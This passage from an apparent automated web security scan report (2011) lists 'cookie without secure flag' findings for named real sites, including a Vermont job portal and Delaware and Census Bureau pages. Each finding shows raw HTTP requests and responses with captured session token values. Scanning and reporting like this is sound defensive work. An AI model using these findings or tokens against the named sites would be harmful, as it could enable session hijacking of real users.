PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.89. https://www.vermontjoblink.com/ada/works/Login.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/Login.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/Login.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:04 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.90. https://www.vermontjoblink.com/ada/works/contactus.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/contactus.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/contactus.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.91. https://www.vermontjoblink.com/ada/works/employeroverview.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/employeroverview.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/employeroverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.92. https://www.vermontjoblink.com/ada/works/joboverview.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/joboverview.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/joboverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.93. https://www.vermontjoblink.com/ada/works/jobsearch.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/jobsearch.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/jobsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.94. https://www.vermontjoblink.com/ada/works/linkview.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/linkview.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/linkview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
server-error: true
Content-Type: text/html; charset=UTF-8
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/

Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th
...[SNIP]...

7.95. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/works/resourcesoverview.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/works/resourcesoverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.96. https://www.vermontjoblink.com/favicon.ico  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:07:34 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada/404/404_qry.cfm
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->

7.97. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: AdsUserLocale=en; Path=/; Secure
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: S=adwords-usermgmt=d2NTU6eMWipPO3ggNY4SrA; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 15
Content-Type: text/html; charset=UTF-8
Date: Sat, 30 Apr 2011 12:18:53 GMT
Expires: Sat, 30 Apr 2011 12:18:53 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

7.98. https://ask.census.gov/cgi-bin/askcensus.cfg/php/enduser/std_adp.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ask.census.gov
Path:   /cgi-bin/askcensus.cfg/php/enduser/std_adp.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/askcensus.cfg/php/enduser/std_adp.php HTTP/1.1
Host: ask.census.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 30 Apr 2011 12:19:03 GMT
Location: /ci/redirect/enduser/enduser/std_adp.php?p_sid=DI-e_Msk
RNT-Time: D=14955 t=1304165943571922
RNT-Machine: 04
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TS8118ae=95ba3721f71ea906fb96d95debcab79aa0a628a26ce70fa84dbbfe37; Max-Age=900; Path=/
Content-Length: 1


7.99. https://assist.dhss.delaware.gov/INCLUDES/INJSC.JS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /INCLUDES/INJSC.JS

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /INCLUDES/INJSC.JS HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:31 GMT; path=/
Content-Length: 39514
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2005 20:05:30 GMT
Accept-Ranges: bytes
ETag: "021245667aec51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:06 GMT


/*'**********************************************************************************
'Name: INJSC.JS        Date Created: 8/28/2002    Created By:Vinod Kesavan
'Purpose: page to store javascript functions
...[SNIP]...

7.100. https://assist.dhss.delaware.gov/PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
